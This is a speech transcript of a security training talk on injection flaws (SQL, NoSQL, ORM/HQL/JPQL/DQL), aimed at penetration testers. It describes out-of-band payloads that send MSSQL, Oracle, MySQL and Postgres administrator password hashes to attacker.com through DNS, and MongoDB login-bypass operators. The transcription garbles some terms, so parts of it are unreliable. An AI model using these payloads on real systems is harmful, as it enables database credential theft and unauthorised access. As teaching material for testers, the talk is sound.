Okay, are you able to see the screen, right?
Yes, sir.
Okay. So hello everyone. Let's start with OWASP A1 injection in service. So who am I? I'm senior manager at NetSQL Solutions. I'm in hobby as a hacker, trainer, and you can find me on the LinkedIn as a RaviRamesh and on Twitter _RaviRamesh. So I will cover OWASP A1 injection part. So injection flow such kind of SQL injection, NoSQL injection, OS, LDAP injection. There are many injection is there when user or attacker can inject untrusted data and it involves in specific operation. So you can say that it's interpreted and executed specific on server side. So in definition, is attack vector almost any source of data can be injected. Inject vector is the environment variable, your parameter, your external and internal web services, and all types of user injected, your user controllable resources. And even injection flow occur when attackers can send hostile data and data into the interpreter. As a security weaknesses, so injection flow is everywhere. You can find in SQL queries, LDAP queries, XPath queries, or XML processes, NoSQL queries, OS command and XML parsers, SMTP headers, expression language, and ORM queries. It's not limited to this one, but it's many more. So when you can, how you can easily discover this kind of injection? You can scan those parameter, or I can say you can fuzz those parameter, and you can find injection flow easily. As a impact, if you found such kind of injection, you may be result into data loss, corruption of the server side, disclosure unauthorized parties, loss of accessibilities, denial of service. That just depends on injection, which kind of injection is there, and what is actually operation is there. So I already covered OS command injection, code injection, and server side include in a K1. You can find on null page the 24th May 2020. You can find a stem slide and a video as well. In Ajay 2, I will cover SQL injection, NoSQL injection, and object relationship mapping. It's called ORM injection. And subpart of ORM injection, I will cover HQL injection, Hibernate Query Language injection, JPQL injection, Java Persistent Query Language injection, and DQL, Document Query Language injection. I will cover in a J3, it's SSGI, server-side JavaScript injection, CRLF injection, IMP injection, and SMTP injection in next month. And then further J4, LDAP injection, XPath injection, hosted injection. In J5, I'll cover EL injection, expression language injection, and part of object graph navigation language injection, server-side template injection. And last, J6, I'll cover XML injection and XSLT, extensible style sheet language transformation injection. So let's start with Ditya Ajay. So in Ditya Ajay, I'll cover the SQL injection, NoSQL injection, and ORM injection. So I can say SQL injection attacks consist of injection of SQL query via input data. So whenever you input any kind of data and it involves in a dynamic query build, so you can find a SQL injection is there. Okay, there is many databases, RDBMS like MySQL, Oracle, MS SQL, IBM DB2, Postgres, MariaDB is there. At NoSQL injection, you can find whenever your injected parameter involves in NoSQL queries, you will definitely find NoSQL injection there. So you can find such kind of database like MongoDB, Cassandra, Redis, CouchDB. There is a 200 plus database there in NoSQL. And there's ORM injection. So attacker injects ORM syntax into user controllable data inputs. So when we say ORM, So there are lots of ORM depend on based on language to language. Java, you can find Java based ORM. It's something like Oracle, Toplink, Hibernate. Some kind of PHP based ORM is a coordinator, Laravel, Doctrine, and there are different ORM provided by different organizations, and you can say different uh, applications. Let's start with SQL injection. So SQL injection attack consists of insertion injection. Like I already said, the same. When you inject your parameter and it involves in dynamic query building on the server side, and it will execute on server the DBMS query. So you will find a specific SQL injection is there, and successfully SQL injection exploit. Maybe you read sensitive data from database, you modify data like insert, update, delete, and execute some administrative operation, such kind of shut down the database, and some case you can trigger or you can put some payload to execute operating system. Okay. In this case, when you send request to the server side, so it request goes to the web application server first, and web application send and communicate with the database server. So, for example, if I inject some SQL injection payload like union select user password from user table, it will directly trigger into database server. It's something like my a genuine query is select name description from product table where p underscore name is equal to I9. And when I inject some payload, it will append into the my base query, and union operation is performed, and based on result, all username and password it will send to the server, web server, and web server send to the user. So I will not explain or not give practical example of SQL injection, because you know that if you search how to SQL injection, so there are hundreds of or thousands of paper and YouTube videos available. So how to do the blind injection or union based injection, I will cover only advanced part. So depending on the transport channel for data retrieval, it's based on your data transformation. SQL injection divided into three independent class. So uh, type of SQL injection based on how you retrieve the data from the server side. So first is the in-band injection. You can say classic injection. In in-band injection, there are two parts: error-based injection and union query-based injection. In second, it's a inference. You can say blind injection. In blind injection, there is another two subcategory: is Boolean-based blind injection and time-based injection. In third one, it's an out-of-band injection. You can retrieve data using HTTP-based technique and DNS-based technique. I not say the out-of-band technique cover only those two parts. You can find another way to data leak using out-of-band technique. So you may add the third or fourth subcategory in out-of-band technique. We'll look into only in out-of-band technique in this slide. So first, let's understand what is in-band. So in-band technique use existing channel between attacker and vulnerable web application to extract data. So it's similar, like if you send any request to the server side, server will respond with the same channel, with the same response. So in this category, you can say there is two subcategory like error-based injection and union-based injection. So usually this channel is standard web server response. It's also you can say it's a member of union technique, use existing web page output, while error based technique use provoke specific DBMS error message, and it displays the error, and error got the data leakage. In error based injections, error message thrown by database server and obtained information about the structured database. You can grab the details about the database table, database, and all through the error-based injection. And union-based injection is nothing but you use only for union functionality or union function to conjunct your string, your payload, and existing string built by developer. You use the leverage of the union SQL operation and combine of the result of two and more than two select statement and the result is a single page or single response. Inference technique, you can say you need to extract malicious SQL query and its result in bit by bit manner. So it will never transport the actual data, but you can compare your bit by bit and retrieve based on behavior. So bit behavior may in terms of Boolean based or you can say content length, or in time based it's always based on time delay. So Boolean based blind technique, visible changes inside a web server response are used to distinguish sunset. I will not read the whole statement, so just normally explain that Boolean based, it's totally depend on your operation which returns a true or false. Based on true and false, it will uh, displays a content length change, or maybe sometime if it's the true then responses come, and if it's specific it's not coming, or it returned a false, then response is not coming from the server side. So based on behavior you can find this Boolean based blind injection. It's typically slow because you specific enumerate one by one or bit by bit character, so it will definitely slow. Second is a time-based injection. It's totally your payload is based on some sleep or some time-based payload. I will not consider only sleep because it's based on one database only. So if you move to the Postgres database, it's a PG underscore sleep. If you move to the specific MS SQL, then it's a different statement. So I can consider like you totally this injection technique based on your time delay. If result is true, so you put some time. If result is true, so delay with 5 seconds or 10 seconds, and if it's false, so it's directly immediately response. So based on behavior you can retrieve your data bit by bit. Okay, let's go with a out of band technique. So if you found there is an injection but you not receive any kind of time delay in a time-based injection, you not received any kind of content length change or some kind of behavior based in response, so you not consider is a Boolean based injection, right? So in this case you can use the out of band technique to use alternative transport channel to retrieve data. It can be HTTP, or you can say it can be DNS resolution. So when detailed error messages are disabled or result being limited to filter, or outband filter result is important. So I will go through the one by one database, which function is used for exploit out of band technique injection. Okay, so in MS SQL, there is a extended store procedure. It's dynamic link library. So you can say there is a multiple store procedure available in MS SQL to hit the HTTP request or resolve the DNS. So first understand what is the Microsoft Windows Universal Naming Convention UNC. So whenever you put some syntax in UNC in generic terms of like double slash your computer name and slash your share folder, so it will resolve the DNS of the computer name. So there is a three different store procedure like master double dot xp directory, xp underscore file exist, and xp underscore subdits. So these three store procedure behavior is a different to it's provoked to DNS address resolution. So let's move with the first one. It's XP underscore D3. So this store procedure used for get the list of all folders and their subdirectories inside the given folder. So you can use this syntax like master double dot XP underscore D3 and your directory path. So it will populate those directory path and go to the directory path and they find the subdirectory. So for that, it will first identify where is the directory exists. Like we put the path C colon Windows, but if you put UNC syntax like double slash your computer name or IP slash your share folder, so it will try to find the directory on particular address. Let's move to the second that XP underscore file exists. So name itself explains this check this particular file exists or not on the disk. So syntax is simple XP underscore file exists and your file path. So it will try to identify that the file is exist on the particular path or not. In third one is the subdirs. So in this store procedure, used to get a list of folders inside the particular folder. So if you use or execute the particular store procedure with input, uh, it will try to find the subdirectories. Yeah. Okay. So exec is nothing but just 1 minute. That's exec is nothing but it's a syntax for execute a particular store procedure. Okay. So let's move to the specific MS SQL, how we leak the data using the store procedure. So for example, if I am a SA user, that's the administrator user, and I want to administer user password through DNS leakage. Okay. So I'm using the XP underscore D3. So syntax will be first I need to declare my one variable, like I just declare the host variable with length 1024 and type is the varchar. I create one specific query, so like select and some host. Host is my defined variable and is equal to my whole query. Query is return the SA user has. So it's a select top one master.dbo.fn underscore valuing to her extstr in bracket password underscore hash from your system table sys.sql login where name is equal to SA. It will return the SA user has. And I just append with attacker.com. Attacker.com, you can put your domain in here. So it will create some string like has dot your domain name. Okay. Now we need to just execute this uh, particular syntax. So I use exec for specific execute store procedure master dot double dot xp underscore d3, and I just put my host value. Host is nothing but my specific hash of SA user and domain name slash xyz. I just append xyz. It means it resolve my specific URL, and URL contain domain name with SA user has. Okay. So in this manner, you can specific pre-calculated store procedure, and you can put this format, and you can find the SA user has using the out of band technique. Okay. So you need to build such technique to data leakage because directly you not pass some string to the store procedure. Let's move to the Oracle database. So in Oracle, Oracle supplies a bundle of PLSQL packages with its Oracle database server to extend the database functionality. So we can use the PLSQL packages for this out-of-band technique. There is a 4 different types of different package available to resolve the DNS, like UTL underscore. I will find identify only for function name like get underscore host address, http.request get glob and ldep init function. Okay, so let's move one by one. So first one is get underscore host underscore address. So you can find this package like utl underscore inaddr provides a procedure for internet address support. Like if you put your host address in as a parameter, it will resolve and it retrieves the IP address of specific host. So you know that whenever you put some subdomain name and it resolve and get the IP, it means DNS resolve, and through DNS you find to your data, right? So query is simple: select your package name utl underscore inaddr dot your function name get underscore host underscore address and your string. In second, http.request. It's something like name itself describe you need to send some request and it will return the first 2000 bytes of data. Okay, so particular given retrieve by the given address. So syntax is simple like select utl underscore http dot request and your URL, and I used from dual table. Dual table is nothing but it's provided by Oracle databases, one row and one column. So whenever you need to temporary operation, so Oracle provides such functionality to use the dual table. You can find more detail in Oracle website how dual work. In third one, that's a get clock. Get clock is a function or method of class HTTP URI type. It returns the character large object. So whenever developers or DBA needs some retrieve clock object from any URL, so they will use this function and will exploit, will use for the out of band technique in Oracle database. So there is a select HTTP URI type and your URL dot get glob from dual table. So let's move to the last one. This dbms underscore ldef dot init. Normally, this method used by developer which involves to create some session based operation on the LDF server. It's something like collaborative with LDF server. So Oracle provides this function like a particular init function. So whenever programmers try to access data from the LDAP server, so init procedure use the initiate session. Okay, so the syntax is simple like select your dbms underscore LDAP package init function and your server address with port and from dual. So in this manner, you can expose or you can link the data using DNS as well as you can port scan through the SQL injection. So if I put a sequence of port like one and second query contains the 2, 3, 4. So through that, if a result given by the particular server, then you can say this port is open. Through this functionality or this function, you can enumerate the port also. Let's move in the example. So if I want to link sys user password has through DNS in Oracle, so query is slightly different from previous, like select password from sys.user$ where name is equal to sys. I just append in Oracle append technique through the double pipeline. So I just put my query to retrieve the sys user has pipeline and .attacker.com with particular port. So it will resolve this particular builded URL and you can leak your data using DNS. In MySQL, you maybe all know there's a load file is available for functionality is available to specific get or reads the file content, right? So you can use this syntax like select load underscore file and particular file URL. But for exploitation part, you can create such query like select load file and concat that's double slash. I just escalate so it displays the 4 times slash. So I want to root user has from the database server, or you can say the particular mysql.user table. So it's query like select password from mysql.user where user is root. So in limit 1, so it will return only one single uh, row with a root user password, and it's append with attacker.com. So when this query is executed, you can find your root user password has through the DNS. And if you don't know about how to DNS work or how to leak data using DNS, you can prefer my first previous slide in OS command injection. I displays the various way to data leakage over DNS. You can find those slide over Null uh, chapter or Null website. Okay. Let's move with Postgres. In Postgres database, PostgreSQL, there is a copy statement is there. Copy statement is used for the insert data, read from this particular file and insert data into particular table. So if I want, I have a whole username in one text file and I want to put those username in my specific table. So syntax is copy your table name and column name from your file name or file path. So we can resolve DNS using the file name syntax. Okay. In this technique, if I want to leak administrator user password has in Postgres using copy statement, we need to create some function. So first, we need to drop table if exists table underscore output. If this name is exists, you need to drop this table. So syntax is simple drop table if it exists and your table name. Now, if it's already dropped, then we need to create a new one. So create table, your table name, table underscore output, and it contain only one column content and type is equal to text. We need to create some function with returns void or return nothing. So syntax is similar like create or replace function temp underscore function. We create a new temp function. If it's already there, so our function is overwritten or replace this function, and it returns void. So in when you need to return void, so syntax is return void as dollar dollar and in last dollar and specific language. Okay. So in particular function, we declared two variable like exec underscore cmd as a text and query underscore result as a text. Now start with the beginning portion of the function and end part. In beginning portion, first we need to retrieve the hash, right? And we'll put those hash in one variable. It's called query result. So it's a syntax is select into your query result variable and your query. So our query is select password from pg underscore shadow table where username is Postgres. So it will return hash and store your data into query result. Now we need to specific bin query which append with my domain name attacker.com. So syntax is copy table underscore output from particular your syntax with a query result my hash and append with attacker.com. Now my whole string with first hash dot attacker.com slash foobar.txt it's built. Now we need to just trigger, right? So we need to just execute using execute syntax execute and your URL. So now function is built. Okay, now we need to execute this function. In Postgres, we can execute function using select select and your function name. So during this, when you select the function, it will execute and resolve our builded query using execute function, execute command. Okay. So there is no specific user-defined. We need to create a user-defined store function because there is a no function provided by Postgres, which is like you just need to put your string and it resolve. There is nothing like that in Postgres. So we need to create some function, user-defined function, and we need to execute. So we use copy functionality as used in Postgres for DNS leakage. So particular SQL injection time, we can say that in Boolean-based blind injection, if you made 29,000 requests, and it will take 214 seconds. In time-based with 1 second, if you made 32,000 requests for the same data retrieval, you can wait for 70,720 seconds for the data retrieve. In error injection, the same data you can retrieve using just 777 requests and just time for 9 seconds. In union based, if fully data is retrieved, then you need just hit 3 requests, and in partially you can hit 136 requests, and it will time is 1 second or 2.50 seconds. In DNS, I can say DNS exfiltration, it's a higher ratio than Boolean based and time based. So you need to just create like 1,400 requests, and even time, if you focus on time specific, it's higher than that achieve ratio compared with a Boolean based and time based. Like, so let's move the next NoSQL injection. So since there is a no common language between the NoSQL database, or you can say the different database, NoSQL database have a different language support. So the injection code are database specific. If you create such kind of queries for particular one database, it will not work with a different database. So not SQL database is accessed using driver which expose the wrapper that provides the library. So if you say like one database you need to you want to exploit, so in this case you need to use a wrapper or its wrapper built on specific language, or you can say it's built for libraries. So let's first understand how many types of databases there in NoSQL. Then we'll move to the NoSQL injection. Okay. So NoSQL models offers a new data model. Definitely, it's query format making the old injection attacks irrelevant. So old SQL injection is not same query not work on the NoSQL database, right? They give attacker to new way to insert your malicious code. So there is a 4 types of NoSQL database. It's types like key value database. You can say Redis and Memcache DB. It's based on key value approach. Uh, in MongoDB and CouchDB is a key document type of database. Cassandra and HBase is a column family, and Neo4j and OrentDB is a graph base. So let's understand the 4 types first. So in key value, you say that all data stored in is a key value pair. So in this manner, like your customer ID and it's append with some value. So key, if you call key, it will retrieve. You can retrieve its value. So all key value based database store this kind of structure. In document database, it's something like key and key store whole object of document. It may be bson object, you can say there's a xml object, but it's totally based on key, and your it's linked with one object, or you can say the document. in column family stores, in this type, every row wise there is a data stored in column manner. Like it's a first row X, or you can say the 1, 2, 3, 4, 5 or row. It's related to row. There is a multiple variable. Maybe first row contains a limited 3 or 4 column, and second row contains the thousands of columns. So it's a column based family store. And in fourth one is a graph based database. It's not specific structure, but it's used for the some social media. If you say that social media stores this data in irrelevant format, like there's a lots of data is not linked with everyone, but you need to just store the bunch of data, right? So that time we can use the graph database. So if we say the complete trend starting from the January 2013 to 2020, so graph itself explains the graph-based DBMS is uh, that trending right now, and then time story-based DBMS, document store, key value store, search engines, widely column, RDF store. So if you focus that RDBMS is a list one, so we can say next generation or next our pen test generation always find such kind of NoSQL database on the server side, because if you look in the past year, the larger or complex application built based on the RDBMS like Oracle, Postgres, or some kind of database. And now trending application, you always find such kind of server side JavaScript like Node.js and different JS based languages with NoSQL databases like Cassandra, MongoDB. There are different databases there, right? So in future, maybe if you find SQL injection, but it's not a SQL, it's NoSQL. So maybe you find a behavior, but your SQL map not work. So we need to understand the NoSQL syntax first. Okay. The similar, if we looking for the rank database and right now in June 2020, so you can find there is a top 10 database list recently collected by dpengines.com. You can find the first uh, rank is Oracle. Definitely, it's the first rank Oracle because of previous builder. Like if you look at both the last 10 year, it's always developer used for the Oracle or standard database, right? Now it's trend for the NoSQL. So you can say the next 10 year you will find a NoSQL database in top. Second is MySQL, Microsoft SQL Server, Postgres, and then MongoDB. So MongoDB is NoSQL database. So in top 10, you can find MongoDB, Elasticsearch, Redis, and Cassandra. So this is the NoSQL databases. So in top 10 itself, NoSQL jump into top 10, and right now you can find the many new application with the NoSQL statement. So we need to just learn about how NoSQL query works, how it's stored. And first, whenever you start with pen test, you need to just understand or identify the database. If it's NoSQL database, then leave all SQL statement aside. Remove the SQL payload in your first list, because there is a NoSQL database. SQL statement or SQL payload did not work. So let's move the syntax. So I select the MongoDB for the demonstration part, because right now it's in trending page and MongoDB is widely used. So in MongoDB, it's a document based store, right? So document store is store the BSON document. BSON is nothing but is binary representation of JSON document. So in this manner, they store data record in collection, and its collection stored in database. So collection is nothing but, you can say, it's a JSON BSON object like my name, age, profile, and group. we can say it's a collection of data or a collection. And if you say the database, in MongoDB, database holds a collection of documents. And to select a database to use, you need to use syntax like use on your database name. And if you want to create a new collection, or in terms of SQL, it's say like if you want to create some new table, okay, so we need to just syntax use db dot your collection name dot insert one and your collection in JSON decent format. So if collection is exist, then it will insert your JSON decent data in particular collection. If it's not exist, then it will create a new collection and store the data. Okay. So you can use the insert one, or you can create index operation to particular respective collection if they don't already exist. NoSQL query, you need to create such kind of query like db dot your collection name dot find. Find is an operation to find JSON or BSON object like score less than 30. So your criteria is there, and the sorting order or some kind of if you want to search on sorted manner, so you put the sort and score -1, so it's descending order. So it will operate like first find the collection, and it will sort the order and find the query criteria like less than 30 score. Let's move to the next example. For example, like MongoDB expect the input in JSON format. So db.user.find. So users is my collection. If I want to put my query criteria, I want to find the greater than 18 age. So query criteria is age colon and greater than 80. If you want to projection something like fname and your type is equal to security, so if you put the projection also, and if you want the cursor modifier like sort limit, so you can put your cursor modifier like limit 5 here. So first I will explain in some uh, query object like db.user.find. In you, this is syntax for the specific. If you use this syntax, db is a current database object. The users is a collection names users in the current database. So it will find only user collection and not touch another collection. Find is a method to execute on the collection, and query object is the specific criteria and projection based your query. So if you look at the MongoDB operation, there is a not equal to mention. You can use using the $any, greater than operation $GT, regular expression. If you match, if you want to match something, you use the regex, and if you want to condition something like where, so you use the $where. So let's compare with the SQL syntax versus NoSQL syntax. It's if I put my SQL string like SQL select star from user where username and password, if you uh, able to put your SQL syntax in password, so definitely in SQL injection you put a single quote or 1 is equal 1 to check the injection or not. In this manner, your database NoSQL query is something like that db.user.find, and curly braces like in JSON format, username is admin and password is the password, right? So if we need to bypass this restriction, or if you want to inject your NoSQL query, you need to just put some kind of this statement like in curly braces greater than blank. So all password is greater than blank, right? So username is admin and password is greater than blank. So ultimately it's written a true, condition is true, and you will log in different manner. You can put not equal to null if you don't want to username, you don't know about the username and password. you put a dollar any null and password is dollar any null, not equal to null. If you don't know about the specific username, but you want to enumerate the password, okay, so you can put equal to and your password. You can uh, add anything like foo bar or just check. If I want to check which user contain password is equal to password, common password, so I will put a username uh, not equal to null and password equal to password. So in this manner, like if you would put, there is a one operation called in. So you can if you don't know the username, administrator username, you can use the in operation, like in admin, small admin, root or administrator, and password is equal to greater than 3. So once you're not able to log in with admin user, you can use the in operation with number of user. Okay, if user is exist, you can log in the application. And if you want to match something like start password start with p, password start with first two character like p at the rate, so you can enumerate this manner using a regex $regex syntax. Okay, let's move to the next. This is a MongoDB payloads provided by the payload all the thing link mentioned in the Swiss K repo. So in this manner, you can say you use the payload. In this case, in first syntax, we use the pure NoSQL syntax, NoSQL queries, and last part is in square bracket. It's something like relevant to only PHP. So in PHP, if you found the application built on PHP and it's accept only parameter format, not a JSON format in request. So you can put as a part of parameter $any and value is equal to a. It will automatically create such object on the server side. And if it's NoSQL database involved in the PHP application, so you can log in. Now move to the object relation mapping injection. You can say short form ORM injection. So in this terms, object relation mapping injection is attack using SQL injection. You ultimately attack SQL injection, but middle layer is ORM, and ORM generated the data access object model. So if you put your actual SQL query, it will not work. So let's understand what is ORM. So ORM tools allow to developer to easy access an application data layer without having write lots of redundant data. Okay. From the point of view of tester, the attack is virtual identical SQL injection. However, the injection vulnerability exists in the code generated by ORM. So when you put some payload, so ORM will generate SQL query and it will pass to the RDBMS or database. And third thing, the ORM don't automatically prevent SQL injection. Keep in this mind, if you use any kind of ORM, it not automatically prevent SQL injection. So whenever developers say we are using such kind of ORM, so this statement for those developers. So in ORM case, you create some object and calling object and you pass in the ORM. So ORM is mapping logic with RDBMS and retrieve the data. So let's put one example, like my code written in C# language, and if I write SQL query in C#, it's something like this, where SQL is equal to my SQL query, and then result is equal to my execution portion, like context dot person dot from SQL row, and SQL my query to list, and it will store result into result variable. And if I want to retrieve first value of the particular query output, then I need to just result zero value and the first name. In this context, if I using the ORM API, so then I not need to create or write a whole query. I need just write a two statement with where person object is equal to repository dot get person 10 id 10, and when I want to first person name, then person object dot get first name. It's totally written by the ORM. You need to just execute or pass this specific function or ORM written function. That's it. The case above make use of object represented to store repository and method to object, definitely. So let's move to the next example. So PHP Laravel use the query builder. So if I want to execute this query like select star from users, order by email, and ascending order. So in Laravel, we need to just write such ORM syntax like user double colon order by email and get. So it will work the same thing. You not need to create a query and load the driver and get first initiate connection, data retrieve, store data, and then connection close. You need to just use the ORM syntax in Laravel. So if we found ORM with a different language that to efficient the test and understand what's happening between your request and background query. So everything related to conduct proper testing. So first we need to identify which specific language is there, which kind of ORM implemented by the developer. So if we don't know about the ORM, they use the ORM and SQL injection is there. ORM based SQL injection is there, ORM injection is there, but you need to blindly put your SQL injection payload, so you never find the SQL injection. But if you identify this Hibernate ORM is used by developer, then it's definitely you can build Hibernate based payload, SQL payload. And if you inject the Hibernate based SQL payload, then result is will pop out. And this is a Java based specific ORM. You can find this JP implemented data nuclear, even Eclipse link, enterprise Java bin, Java data object, top link by Oracle. There's a well known the Java based ORM. If we look at for the .NET technology, .NET technology, the famous one, the link queue. If you develop for .NET, definitely you know about the link queue. There is a different ORM provided by the .NET supplier. If you use the Python, the Django is there. Django ORM included Django framework itself. That SQL Alpha, like Storm, Tycoon, Udo, SQL object. Those ORM available in Python. If you move to the PHP, the CAC PHP, ORM and framework for PHP 5, coordinator. If you know about the coordinator, it's used its own specific ORM, Doctrine, Fuel PHP, Laravel, Propel ORM query toolkit for PHP 5, Qkodo, Yield, Zen framework used its own. So in this case, there is a SQL injection, but you need to just create your SQL query in ORM way. So let's move to how ORM actually works. So in ORM, how it works. So if you put your query, like I provide the Java based query like JPQL and HQL. HQL is nothing but a Hibernate query language. So in ORM manufactured query, you can build this query and pass to the application that will parse the JPQL or HQL query and build a JPQL and HQL AST. AST is nothing but an abstract syntax tree. It will create a HQL based abstract syntax tree and translate to JPQL and HQL AST into SQL AST. So if you pass the HQL query, it will convert to SQL AST, and SQL abstract tree will build an actual SQL query, which is far on the database. Okay, so let's start with the Hibernate query language. So it's called a Hibernate query language, and if you found the injection in SQL Hibernate query language, so it will call SQL injection, Hibernate query language injection. Okay. So Hibernate is open relation mapping ORM that map class definition without source code with associated SQL table. Okay. Uh, so the SQL query is translated into SQL by Hibernate framework itself, and then SQL query is passed into the database. So application use SQL. When you inject your payload, it will work with a SQL, not a SQL. Hibernate will convert your SQL payload to SQL and work with DBMS. So if you put SQL payload here, it will not work because Hibernate not understand the SQL syntax. Okay, so let's move. SQL does not support comment. If you put SQL comment in your payload and it backend is a Hibernate, so you the payload not work because SQL is not support comments. SQL does not support union query. Even if you put a union based injection in SQL, it not work. So this is some example how SQL query look like. In from call, it's from employee. So it's something like in employee table, they need to some data, and from your whole object path or package path com.hibernatebook.criteria.employee. So it will load whole object or you can package stored in the particular object. As you can assign some aliases like employee as E, and then later we use E dot column name. Select query is most similarly normal SQL queries. Select your uh, alias dot your column name from employee table and alias name E. Where cause, so you need to start your query to from employee E, where E dot ID is equal to 10. It means it will find the ID 10 in employee object. So if you want to object order by, so query start with from. So in this manner, you now understand that it's totally different from SQL string, right? You need to just understand how SQL query is built, how SQL queries work, and how SQL syntax is made. So now let's move to the how SQL queries work. So we need suppose there is a backend RDBMS is a MySQL. For example, in this manner, uh, the DBMS is MySQL, and in between Hibernate is there. So first we understand that Hibernate, how Hibernate escape the any string and how MySQL escape any string. So Hibernate escapes single quote and it will convert into double quote, not double quote, two times single quote. Okay. So Hibernate escape the single quote to double two times single quote, and MySQL escape single quote to SQL using /. Now, if we put in payload this syntax, what about this string? ABC slash two times single quote or one is equal to select query and hyphen hyphen. So in this manner, Hibernate thinks it's a string because it's in between the two single quote, and this is the whole string. The purple color is a whole string. Hibernate understand it as string. It will pass under the MySQL database. And once MySQL receive this string, right? So it's slash that single quote is escalated by the MySQL. So MySQL understand this is a single quote, that's fine. But second single quote, it break the syntax, and rest of syntax or rest of our payload will execute. So this is one example. Like my query is from contact where last name like Doi. So it will find the last name Doi, and the actual when it's create a SQL string, select contact 0 underscore last name as last name underscore. This is the SQL part which is not visible to any user, but is background process that ORM convert to the ORM syntax to uh, that SQL. So if we put this payload, so my payload is last name. In application, I put this payload in my parameter test1 single quote and 1 is equal to 1. And I just put a escape part for MySQL, okay, and union query. So we know the union not supported by Hibernate, right? But when Hibernate comes into picture, this is the Hibernate part. So Hibernate understand this is the whole string, okay, like from contact where last name like test1, it's we put a single quote here, and then past part that end function and single quote 1, that whole red part is a string is equal to 1 star. So we first inject our Hibernate query, so it's called Hibernate HQL injection, and now it will convert Hibernate, it will convert ORM converts the Hibernate query to SQL query. That time in MySQL part, that's a green part, it escape the single quote, and actually MySQL string is built, and then union work, then MySQL part, and then even comment its work in this MySQL part. So we need to just identify how MySQL query work and how HQL is work. In this manner, if you use MySQL, we need to put this kind of escalation part. If you use the Postgres, there is a different syntax is there. For Oracle, it is a different, and MySQL is different. So with Hibernate, we need to find how to escalate the Postgres as well and Hibernate as well. So in second, Java Persistent Query Language Injection is a JPQL, is a platform independent object oriented query language defined as a part of JPA. You can say Java Persistent API. So JPQL used to make a queries against entities stored in relational database. It's similar to, I can say, the ORM based, so it's similar to HQL. Uh, so SQL works directly against the relational database table, record or field, whenever JPQL works with the Java classes and instances. So once you put a JPQL, Java classes and instances, it will convert to SQL queries and trigger into the database. JPA, so JPQL is based on JPA specification defined as a part of JPA specification. So JPA does not support SQL union, intersect, and expect operation. Some of JPA provider may support this, but keep in mind this union not work in JPA. So JPA based, every ORM not support the union one. So in this case, if you want to use the select statement, select, you need to just put this statement, select new package name and your column name. So it will work with the object, right? So it's a totally based on object. There is a function. If you want to execute some function, so there is a syntax called function and your parameter name. If you uh, that it's something like whenever SQL operation or SQL syntax is not supported by ORM, ORM also provides such kind of functionality to execute directly SQL statement, which not supported by JPQL. It's called SQL. So if you want to execute or work with a dual table in Oracle, dual table not supported by JPQL, right? A syntax not supported by JPQL. So SQL, that function provided by JPQL, uh, once we put our SQL statement in SQL function, it will treat it as a SQL string, SQL syntax. So let's move to the how it's work. So if I put a SQL select one where 1 is equal to 1 is equal to 1, it's a JPQL statement, and it will convert or translate to SQL. It's something like select 1 where 1 is equal to 1 is equal to 1. It means in single quote between the two single quote in SQL variable, it's treated as whole query, real query. So without any care about what specific and blah blah blah. So there is no check for this internal query, internal structure. Okay. So if I put some my value, dummy is nothing but like maybe it's your first name, last name, any parameter value, and if I put single quote and SQL that variable and my actual query, SQL query, and 1 is equal to 1. So its syntax is true in specific JPQL manner. And if I put some kind of select 1 is equal to 2, it will return a false. So we need to just put our SQL statement here, right? So once you identify there is a JPQL injection is there, ultimately our JPQL injection or JPQL string, it will convert to SQL statement, right? So why can we use the SQL map? Yes, you can. So just we need to identify the insertion point. Where is the insertion point? And in SQL injection, you need to just provide the whole query where place the SQL function in JPQL. Just put your string and the star. Star is nothing but injection point for providing for a SQL map, and provide the database management system. How what database is a backend database? It's in this case it's Postgres, and technique is a blind. Okay, and I just want to grab the banner. So this is the syntax. So you can smartly use the SQL map for the ORM injection. Okay. The third one is a doctrine query language. It's DQL normally used for object query language created by helping user and complex object. So in previous, DQL is supported for the PHP language. Okay. So the syntax is something like if you want to select something from table and where. So doctrine you can use in query in programming language. You use some kind something like this. Join. You can use the join. You can use the subqueries. So maybe your inputted value is here, maybe here, append with here, maybe here. Right? We never know. We never know where our payload will inject. So in DQL, the DQL query is something like select P from your object app slash entity slash post P, where ID is equal to your query order by your object or your column name. So in such manner, SQL query is select star from post where ID is equal to your query and order by. So your query is the injection point. So how will exploit? So previously I explained the what is ORM. We need to understand the ORM model, ORM syntax, and then we'll go for the ORM injection, right? So it's up to you. You need to just identify how DQL work, how DQL exactly syntax is there. I just mentioned the block for DQL injection, and uh, if you go to the specific part in this one, Java. So I explained the HQL, how HQL is work. Maybe you explore or you develop EGB based application and you identify ORM is there, and you find any way to bypass or any way to enter any your SQL payload in EJB. It may be 0-day for EJB. It may be 0-day, or you can put your name like EJB injection, something like that. Okay. Even if you find the top link base or JQ base and common anything like ebean based injection, and you can put your name into the specific 0-day name, ebean injection or something. Right. Similar manner in Python, .NET, Linkubase, and XPO base, you need to just grab one ORM, implement your an application, and create a query based on the specific and retrieve the data using such manner. So if you go to the ORM page that I mentioned in, so I will share my another screen, just 1 minute. Okay. So well known the ORM provided by Laravel. So it's written in April 9, 2019. So Laravel is something like if you want to create such kind of query, select star from user order by email, you need to just write this right in Laravel. So in this 2019, someone find this kind of syntax if we inject, so we can inject our SQL query in Laravel. So Laravel fix this issue. Okay. So this is just one example. So for ORM, it's totally based on ORM syntax. You need to just first understand the ORM part, ORM syntax. You need to build a query based on ORM, mapping with SQL queries, and that's all. If you have any kind of question, you can put on live stream. I will answer on live stream. You can find this PPT on the Null website, uh, where I have already put this link, PPT link. And thank you. Thank you all.